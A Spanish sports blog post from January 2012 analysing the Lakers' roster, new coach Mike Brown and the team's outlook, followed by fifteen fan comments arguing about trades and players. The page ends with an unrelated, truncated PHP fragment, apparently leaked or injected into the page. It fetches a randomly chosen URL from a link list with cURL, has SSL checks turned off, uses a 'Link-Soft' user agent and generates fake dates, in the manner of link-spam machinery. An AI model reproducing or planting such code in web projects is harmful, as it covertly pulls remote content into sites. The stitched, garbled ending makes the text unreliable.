L. A. Lakers: Quo Vadis?

01 de January de 2012 por MagicJohnson32

¿Hacia dónde se dirigen los Lakers? El rumbo que parece haber emprendido la gerencia de la franquicia del purple & gold es, cuanto menos, incierto. El equipo ha dado su primer paso atrás en competitividad desde 2004, e incluso en aquella ocasión se adivinaba -si uno era capaz de mirar más allá de la polvareda levantada por el traspaso de Shaq- una voluntad clara de reconstruir en torno a Kobe Bryant.

Esta vez, la única lectura que podemos hacer es la obligada por los movimientos emprendidos durante la off-season, con la marcha de Lamar Odom y Shannon Brown y las incorporaciones de Josh McRoberts, Troy Murphy y Jason Kapono. Por mucho que valoremos la incorporación de McRoberts, y dejando de lado el sabotaje de Stern al traspaso de CP3, la única manera de explicar el traspaso de Odom (nada menos que al equipo que barrió a los Lakers el pasado mayo y por nada más que una Trade Exception) es a través de la presión que el nuevo convenio supone para las franquicias que arrastran mayor carga salarial.

En pocas palabras: el Dr. Buss ha cerrado el grifo.

Durante sus más de 30 años al frente de la franquicia, Jerry Buss ha aplicado una filosofía de éxito incuestionable, fundamentada en la apuesta por grandes estrellas. Para ello ha dedicado tanto dinero como cada ocasión ha requerido, y todo paso atrás sólo fue anticipo de un gran salto adelante. La ambición sigue vigente, como parecen demostrar los intentos por hacerse con Chris Paul y Dwight Howard, pero las condiciones impuestas por el nuevo CBA suponen un cambio en las reglas del juego. Los más de 90 millones en salarios que Lakers pagaban antes del traspaso de Odom resultarán insostenibles en dos años, y esto ha pesado más en la actitud de la franquicia que la derrota en semifinales de Conferencia.

paubyLo único que sabemos con absoluta certeza es que no han llegado ni Paul ni Howard ni ningún otro gran nombre, y las dudas heredadas de la eliminación a manos de los Mavs no han hecho más que crecer con la marcha de Odom y el gris inicio de temporada que firman los Lakers. Tampoco ayuda la elección de Mike Brown como relevo de Phil Jackson para el banquillo. Descartada la opción continuista, personificada en el ahora asistente de los Pacers Brian Shaw, Jimm Buss valoró la ortodoxia, ética de trabajo y experiencia al frente de los Cavs que representa Brown. El técnico tiene entre manos una plantilla que cuenta con Kobe Bryant, Pau Gasol y Andrew Bynum como referentes claros. Sin Odom, la responsabilidad recaerá más que nunca sobre la pareja interior titular, que debería firmar una temporada estelar siempre que Gasol se sobreponga a críticas y rumores de traspaso y que Bynum logre mantenerse sano. Contar en el quinteto con dos 7 pies tan complementarios y de tanta calidad sigue siendo un lujo y algo que volverá a marcar diferencias.

La salud de Bryant también vuelve a ser motivo de preocupación. Aparentemente solventados los problemas en dedo, rodilla y tobillo que lastraron a Kobe el año pasado, en esta ocasión es la muñeca diestra la que ha estado a punto de alejar al escolta de las pistas lo suficiente como para poner en riesgo la campaña de los Lakers. Por lo visto hasta el momento, la lesión no afecta en exceso ni a kobewristla mecánica ni al acierto de Bryant, que un año más liderará la ofensiva del equipo pese al cambio de 180º en los sistemas de ataque. Con Brown ha quedado desterrado por completo el triángulo ofensivo, y en su lugar veremos con mucha mayor frecuencia jugadas ISO (es decir, a partir de aclarado) y pick & roll. Y aunque los Lakers carecen de los recursos adecuados para brillar al contrataque, el equipo puede explotar la velocidad de sus interiores en transiciones rápidas.

En cualquier situación, en todas y cada una de sus versiones, el peso del juego recaerá sobre el trío ya mencionado. El problema en la posición de base sigue sin solucionarse, con lo cual Derek Fisher volverá a ser el titular hasta que Blake demuestre algo -no haría falta mucho pero sí un mínimo que, por el momento, ni se vislumbra- o hasta que Kupchak encuentre la manera de reparar el gran punto débil del equipo (echando mano, por ejemplo, de la Trade Exception de casi 9 millones procedente del traspaso de Odom).

Tampoco ofrecen garantía alguna las opciones para el puesto de 3. Matt Barnes se ha enredado en su papel de matón y el jugador anteriormente conocido como Ron Artest llega con nuevo nombre y algunos kilos de más, por lo que Brown se ha decantado en este inicio de temporada por Devin Ebanks como titular. El sophomore, una versión por pulir de Trevor Ariza, ofrece al menos entusiasmo y buen juicio, además de una interesante proyección. Mike Brown desveló hace unas semanas que piensa en Metta World Peace como sexto hombre y líder de la segunda unidad, una decisión que parece un acertado intento de recuperar al jugador a través de un cambio de rol. Si se mantiene fiel a esta afirmación, el rol de titular se lo intercambiarán Barnes y Ebanks en función de su rendimiento.

mcrobertsLALEn su papel de jugador de banquillo ha de tener un gran calado la intensidad incansable de Josh McRoberts, quien firmó por la mini mid y supone la principal novedad de la plantilla tras dejar en los Pacers buenas muestras de lo que es capaz de aportar. Otro que ha llegado como incorporación de bajo riesgo (contrato de un año por el mínimo) es Troy Murphy, profundamente devaluado después de una campaña negra y quien debe añadir rebote y el tan necesitado lanzamiento exterior. Por este mismo motivo los Lakers han fichado también a Jason Kapono y eligieron en el draft pasado a Andrew Goudelock, para quienes queda reservado un papel marginal como meros especialistas. La plantilla se completa con Luke Walton (lo más próximo a un ex jugador que se puede ver sobre un parquet), Derrick Caracter (lesionado de gravedad durante la pretemporada) y el rookie Darius Morris, combo guard elegido en el pick 41 del draft tras una buena segunda temporada en Michigan.

Lo que queda es una plantilla, técnico incluido, de perfil inferior al que venía ofreciendo en temporadas recientes. Con salud, los Lakers volverán a ser competitivos, algo que la sola presencia de Bryant y Gasol ya garantiza. Así que, si la familia Buss limita el gasto tanto como estas pasadas semanas han dado a entender, no ha de resultar tan preocupante el presente como el proyecto de futuro de los Lakers.

Quinteto inicial: Derek Fisher, Kobe Bryant, Devin Ebanks, Pau Gasol y Andrew Bynum.
Sexto hombre: Metta World Peace.

Pronóstico: Finalista de Conferencia.

Comenta

15 comentarios a esta entrada

  1. melo15 dice:
    #1

    Para mi lo fundamental, esque Pau y Bryant recuperen la sintonia, y que Metta se centre un poco al igual que Barnes.

      Citar

  2. Blade Petrovic dice:
    #2

    David evans no era uno de una novela.
    Bueno me parece q los lakers no van a llegar a final de conferencia

      Citar

  3. Nacho dice:
    #3

    Acertado análisis, aunque en el pronóstico añadiría …o lo que ellos quieran.
    Tanto para un lado como para el otro.
    De momento la vuelta de Bynum ha sido bestial. Siguen teniendo (sanos) el mejor juego interior de la liga, y el más versátil. McRoberts tiene mucha menos clase que Odom, pero le supera infinitamente en intensidad, y era algo de lo que adolecían los de púrpura. Aunque parezca mentira el cambio puede ir a mejor. De momento Blake está de altibajos, pero si suma hacia arriba asegurarían el puesto de base. En el de ala tienen tres bazas que pueden resultar interesantes (creo que les interesa ayudar a Ebanks a que de un paso adelante, pero esto no tiene por qué significar la titularidad)
    Si realmente tienen hecho lo de Howard (a mí sigue sin cuadrarme allí, pero seguramente me equivocaré) para el verano, pueden esperar a febrero para ver que hacen con la trade exception, y hacerse con un 1 si Blake no se consolida.
    Lo dicho, con todo lo negativo que hemos hablado estos días de ellos y su GM, creo que en estos cinco games han demostrado que tienen mimbres para aspirar a todo… o a nada. De ellos depende.
    Y Gasol tiene una oportunidad de oro, ganar otro anillo e irse a un retiro dorado ¿Houston? ganando pasta, haciendo números y llevando a una franquicia a cotas más altas que las que prevean los opinadores a principio de temporada.
    Y entonces sí, entonces ya me dará igual lo que hagan los Lakers, su forma de actuar harán perder definitivamente mi segumiento hacia ellos y los recordaré como el equipo que me cautivó en los 80, y que volvió a engancharme gracias a Pau.

      Citar

  4. Denise dice:
    #4

    Bueno, al final, gracias a Stern, los Lakers no se han cargado el equipo. En mi opinión, hubiera sido nefasto para ellos el hacerse con Paul a cambio de Gasol.
    Todavía tienen un equipo competitivo digno de luchar por el anillo. Pero creo que ésta será la última gran oportunidad hasta que Kobe se retire. El motivo, el contratito de Kobe con 27 y 30 kilos en los 2 próximos años que hipotecan totalmente el futuro del equipo y la posibilidad de traer buenos jugadores. Por ello, espero que a final de temporada traspasen a Pau, igual me columpio, pero creo que en cualquier equipo tendría mas posibilidad de ganar el anillo que en los Lakers a partir de la proxima temporada.

    Centrandonos en ésta, lo de Odom fue una cagada se mire por donde se mire, pero en Mc Roberts y en Murphy han encontrado un buen par de parches para tapar esa fuga. Shannon Brown, que a mi juicio debería haber sido desde el año pasado como titular de este equipo, se fue, pero Ebanks (Ariza 2.0.) irá progresando y Barnes centrado y motivado aporta mucho en defensa y rebote. El año pasado hizo un gran inicio de campaña, después se lesionó 2 meses, y cuando volvió, no tenía ritmo y Phil Jackson se empeñó en darle minutos por decreto a Metta WP y ésto acabó por desmotivarle. Si Mike Brown es más justo que tito Phil (seguro que sí), Matt Barnes será de gran utilidad para los Lakers.
    El punto debil sigue siendo el de base, Fisher está absolutamente acabado y Blake es un buen jugador pero de 20 minutos por partido, no más. Pienso que el GM se equivocó no firmando un base, y no me refiero a Chris Paul, porque éste no es el tipo de base que Lakers necesitan y menos a cambio de Pau.

    Conclusión, veo a Miami muy por encima de ellos (y de cualquiera en la Liga) pero con suerte, alguna lesión o pelea entre hombres importantes de Miami, o algun jugador que explote (Ebanks, McRoberts, que Kapono sea un buen microondas, que Blake de un paso adelante) podrían conseguir el anillo, aunque como he dicho antes, será su ultima oportunidad hasta que Kobe se retire o se acabe su gran contrato, y alguna estrella de turno que sea agente libre por ese tiempo acabe fichando por Lakers, ventaja competitiva que siempre tendrá la franquicia el estar ubicada en Los Ángeles y tener un pasado glorioso, y que les sirve para tener siempre un top 5 como jugador franquicia.

    Y espero que el partidazo de esta noche de Bynum sirva para que los contactos entre Lakers y Magic por Dwight Howard vulevan a intensificarse.

    PD: ¿Qué ha sido de Gerald Green?

      Citar

  5. Jose Luis dice:
    #5

    A Gerald Green lo cortaron hace ya unas semanas

      Citar

  6. Vader dice:
    #6

    Siempre que no haya un traspaso de por medio creo que la vara de medir de estos Lakers sera la salud de Bynum y el rendimiento de Blake. Con Blake a su nivel máximo y con Bynum sano estos Lakers pueden ganar tranquilamente otro anillo. De Bryant y Gasol no tengo dudas, se han ganado mi confianza despues de tantos años a gran nivel.

    Otra cosa que deberian hacer es dosificarse en esta temporada tan apretada aún a cuenta de algunas derrotas. Si llegan sanos a playoff y con Bryant, Gasto y Bynum a tope yo los sigo viendo favoritos por delante de Miami porque en la zona se los podrian merendar.

    Saludos

      Citar

  7. Vader dice:
    #7

    *Donde pongo Gasto queria decir Gasol (jejeje)

      Citar

  8. TheDeerHunter dice:
    #8

    Contesto a Denise, porque como suele ser habitual en sus comentarios respecto a Lakers estoy profundamente en desacuerdo:
    – Para empezar el trade CP3 no era nefasto en absoluto, sino todo lo contrario. Deportivamente, si quieres tenía sus lagunas, pero le resolvía la papeleta de una forma increíble salarialmente, dejando la puerta abierta al otro gran refuerzo que se barajaba. Personalmente me dolía por el asunto Gasol, pero objetivamente hablando era cojonudo para el equipo desde muchos puntos de vista. De haber logrado esa tríada CP3-Kobe-Howard tienes anillos para parar un carro los próximos años. Ni punto de comparación con respecto al actual proyecto, cada día más cercano a su extinción. De todas formas, en una cosa sí estoy de acuerdo… y es que tener en un mismo equipo una concentración de contratos como la que empieza con el de Kobe es un suicidio firmado.
    – A partir de ahí, lo de Odom es consecuencia del “Sternato” y de una situación sin precedentes en la liga. Un accidente. De todas formas tal y como está rindiendo en Dallas ha sido un regalo envenenado y con los números en la mano todo un acierto haberse librado de él. En realidad los que le conocemos bien sabemos que tiene ciertas tendencias nocivas. Es un artista, pero le falta un punto de consistencia bastante gordo.
    – Mencionas la titularidad para Shannon Brown. No se me pasa por la cabeza que estuvieras pensando en Kobe. ¿Shannon Brown de base titular?? Me parece una barbaridad. Shannon no ha sido ni será jamás algo parecido a un base. Y en mi opinión es uno de los grandes blufs y una de las grandes decepciones del proyecto reciente de Lakers.
    – Fisher no está ni ha estado nunca “acabado”. Ni cerca. Es obvio que la posición debería reforzarse, que necesita ayuda y que Blake ha sido incapaz de darle un mínimo descanso sin caer en la ruina. Es evidente que sufre contra bases de élite y son habituales en el hábitat natural de Lakers (las eliminatorias) Pero sólo hay que ver la nueva lección que le ha dado a un base eléctrico como Lawson como para dejarse de tópicos sin significado como lo de que está acabado. A su nivel actual los Lakers van a tener que remover Roma y Santiago para suplirle definitivamente como titular. El problema de la posición de base es más ajeno que de Fisher… de toda la vida.

      Citar

  9. RSB dice:
    #9

    Ay los Lakers… A mí me dan la sensación de equipo a medio hacer. Desde los despachos no han hecho todavía los deberes, y preveo un movimiento bastante importante antes de llegar a disputar los playoff (no tiene porqué ser Howard).

    De entrada el panorama invitaba poco al optimismo. Kobe con un año más sobre sus piernas y con molestias. Pau convertido en el cabeza de turco y psicológicamente tocado. Dos agujeros negros del tamaño de una catedral en las posiciones de alero y de base, y sin Odom. Para echarse a llorar.

    Pero confieso que me ha gustado lo que he visto de LAL en estos partidos. La cosa ya no pinta tan mal gracias a McRoberts y Murphy, que estan dejando muy buenas sensaciones.

    Aunque me parece un error hablar a toro pasado del traspaso de Odom (nefasto) como un éxito incluso. Primero porque a los dos blanquitos altos los podrían haber traído igual estando Lamar, y éste jugar de alero titular (es complicado a su edad que vuelva a los orígenes, pero aún bajando su rendimiento, es mejor que lo que hay ahora). Segundo porque Lamar ha empezado fatal de Dallas (lo veo muy tocado mentalmente) pero no va a estar toda la temporada así. Y tercero porque, aún en el supuesto de que Odom hiciera una temporada muy mediocre, tenía un cartel enorme igualmente en el momento del traspaso.

    Un hombre alto al precio que se pagan los interiores, entradito en años pero con mucha clase, y un salario muy apropiado y ajustado, algo imposible de ver en esta liga. Era una ganga. Muchos equipos se hubieran dado de ostias por conseguir a este jugador. Por eso me parece incomprensible la gestión del GM angelino. Vale, que nadie tiene la culpa de lo de Stern, que Odom se sintió herido, entró en un despacho y dijo “me quiero ir”. Pero eso es una cosa, y regalarlo a los pocos días, y encima a un rival directo, es una estupidez.

    Si Odom no pinta nada (ni él ni ningún jugador) a la hora de decidir su futuro y lo mandaban para NO empaquetado, no sé qué pinta entonces exigiendo una salida a x destino. Haber esperado, haber sondeado que podías sacar de él. Puestos a regalarlo a un rival directo, pues pregunta sin salir de LA. Los Clippers matarían por un 4 como Odom, ya que no tienen rotación interior de garantías (como muchísimos otros equipos), y tienen 5 bases joder. Mo Williams, Bledsoe… Había opciones mejores que una TE monda y lironda.

    Veo a estos Lakers haciendo una RS decentilla, pero cayendo en primera ronda de playoffs. Ahora mismo si no se mueven, a mí me parece que sus opciones de anillo son totalmente nulas. Dependen de demasiados milagros (que Blake no sea un lastre un año más -de Fisher no digo nada, por edad ya es imposible-, que Barnes no se vuelva a diluir como un azucarillo, que MWP resucite regularmente, que Ebanks madure muy rápido, que Bynum no se lesione nunca -ni Pau ni Bryant-, que la defensa exterior no sea una casa de putas como siempre)… Muy difícil.

      Citar

  10. Denise dice:
    #10

    Contesto a Deer Hunter, porque como suele ser habitual en sus comentarios respecto a Lakers estoy profundamente en desacuerdo jejje:
    – La triada Paul-Kobe-Howard era nefasta y horrible. Además creo que era imposible que se produciese, pero me explico. Imaginemos que Stern acepta el traspaso y llega Paul a cambio de Odom y Gasol. Pero después si quieres conseguir a Howard ..digo yo que tendras que dar algo a cambio…y los Magic no habrían aceptado un cambio a pelo Howard por Bynum, habrían pedido algo más y los Lakers no tienen mucha cosa más suculenta que ofrecer. Por tanto, no creo que de esa forma hubieran conseguido un Kobe-Paul-Howard para este año.
    ¿que habría pasado?
    Pues la pintura se habría quedado muuyyyy coja con McRoberts, Murphy y Bynum, por lo que habrían usado a Blake como moneda de cambio y la trade exception de Odom para completar la pintura. Pero no creo que lo que hubiesen traido hubiera sido mejor que Pau. No hay interiores mejores que Pau en el mercado a esos precios.
    Por otra parte la dupla Paul-Kobe no pega, ambos asumen demasiada bola, a efectos prácticos, Kobe es el base de los Lakers y el que posee el balón en las posesiones de los amarillos. Repartir el balón con Paul hubiera propiciado una situacion a la que Kobe no está acostumbrado y no sabemos cual hubiera sido su reacción en el juego, pero creo que habría sido peor.
    Y por cierto, los años no pasan en balde y a dia de hoy Kobe ya no es tan killer como Durant, Rose o Lebron, y su actitud en cancha, quizas por el hecho de haber ganado 5 anillos y tenerlo todo, deja bastante que desear (vease la mandarina que se tira al final del partido de hoy contra Denver y su no-balance defensivo, quedandose con la mano arriba como si fuese Jordan y olvidandose de Gallinari que no ha forzado la prorroga porque los Dioses del Staples no han querido)

    – Teniendo en cuenta que Fisher está acabado (Si, me reafirmo) y Blake no rindió el año pasado al nivel esperado, creo que Shannon debería haber sido el base titular el año pasado ( me comí palabras en el anterior comentario, ni siquiera mencioné la palabra base). Tiene actitud defensiva, tiene sangre, es atletico y fisico y aunque no sea un tirador es capaz de meter desde afuera. Shannon es muy buen jugador, estamos hablando de un chico que a la sombra de Kobe y jugando 19 minutos de media, el año pasado se fue a los 9 puntos con buenos %, muchiiiisimo mejor nivel el suyo que el de Fisher o el de Blake. Además, de más es sabido que el estilo de juego de Lakers, donde como ya digo a nivel práctico el base es Kobe, no requiere de un base jugón de 12 asistencias por partido. Simplemente con uno que defienda dignamente al rival, suba el balón hasta medio campo sin perderlo y anote tiros abiertos con regularidad basta.

    Para esta temporada, he comentado que se debería haber fichado a un base, en mi opinión un base mediano tipo Barea, Ridnour, Bledsoe, Lou Williams o Sessions, con eso hubiera bastado y no un base a lo Paul.

    – Y retomando el tema de Fisher, continuando con los 3 puntos en que has dividido el comentario anterior. Para mi está acabado, puede haber sido un gran base, mejor persona y un buen o mal representante del sindicato de jugadores, pero a día de hoy es de lo más acabado que se puede ver en una cancha de la NBA. Obviamente la muñeca no se pierde con la edad, y no sería de extrañar que en un determinado momento con Lakers perdiendo de 2 a falta de 5 segundos anote un triple victorioso. Por supuesto, cualquier jugador profesional ya sea en la NBA o en la Liga EBA puede hacer un clutch ganador, pero de ahí a esperar que te ofrezca un rendimiento óptimo con regularidad es ser demasiado optimista.
    Te cito literalmente “A su nivel actual los Lakers van a tener que remover Roma y Santiago para suplirle definitivamente como titular”, en mi opinión cualquier base que ficharan no darían el gran rendimiento que ha dado Fisher en la decada que llevará de purpura y oro, pero no sería nada complicado el dar un rendimiento superior al ACTUAL Derek Fisher. Cualquier base lo haría en estos momentos.

      Citar

  11. Denise dice:
    #11

    Bastante de acuerdo en el anterior comentario de RSB excepto en 2 cosas:

    – No creo que las opciones de Lakers sean totalmente nulas o que se eliminen en primera ronda. A pesar de los errores del GM, todavía tienen equipo para dar guerra (gracias al comisionado Stern).

    – A los Clippers tampoco les hubiera vendido a Odom. Estamos hablando de un pedazo proyecto de futuro. Si encimas le vendes a Lamar a tu vecino y enemigo entonces te estás haciendo tambien el harakiri porque los Clippers se hubieran posicionado como favoritos nº1 en el Oeste.
    Quizas mejor a Cleveland por Sessions o Gibson (ahora que éstos tienen a Irving) ó haber apostado por Barea.

      Citar

  12. Sempren dice:
    #12

    Claro que en ese sentido no es la mejor opción, pero yo creo que RSB lo cita como ejemplo de traspaso que se podría hacer perfectamente porque los Clippers querrían a Odom y tienen monedas de cambio muy interesantes para Lakers (y no solo monedas de cambio, sino que a Clippers les vendría bien deshacerse de algún base).

    Y respecto a lo que dice Deer Hunter, contestarle que es cierto que Odom es todo lo contrario a regularidad en el juego, pero que los últimos dos años no nos podemos quejar en ese sentido, y que ahora esté haciéndolo fatal en Dallas no implica que fuera a pasar lo mismo en LA, ya que está en un equipo nuevo, con un par de jugadores con unas cualidades poco compatibles con él (en mi opinión se pisa con Dirk y Marion), después de que lo intentaran vender y ahora lo hayan regalado, etc.

      Citar

  13. HisRoyalAirness dice:
    #13

    Cuànto tiempo sin leer a Magic!
    Buenísimo el anàlisis!

      Citar

  14. Sancho88 dice:
    #14

    Darius Morris, Jason Kapono y Josh McRoberts a la pista faltando 46 segundos en el partido previo al All-Star, los tres juntos, y sin haber jugado previamente en todo el partido. Esto huele a homenaje, y por ende, posterior traspaso.

    Pau-Morris-Kapono-McRoberts

    a cambio de

    Boozer-Korver-Watson

    Pd: Pirula mental a las 6:34 de la mañana. Probabilidad de que suceda: 2,5%

      Citar

  15. nba dice:
    #15

    Secundo la mocion ;-PP
    Parece que Pau se ha puesto en modo 20-10 , esta haciendo lo mas inteligente, mejorar su rendimiento para que las ofertas de traspaso se cristalicen

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>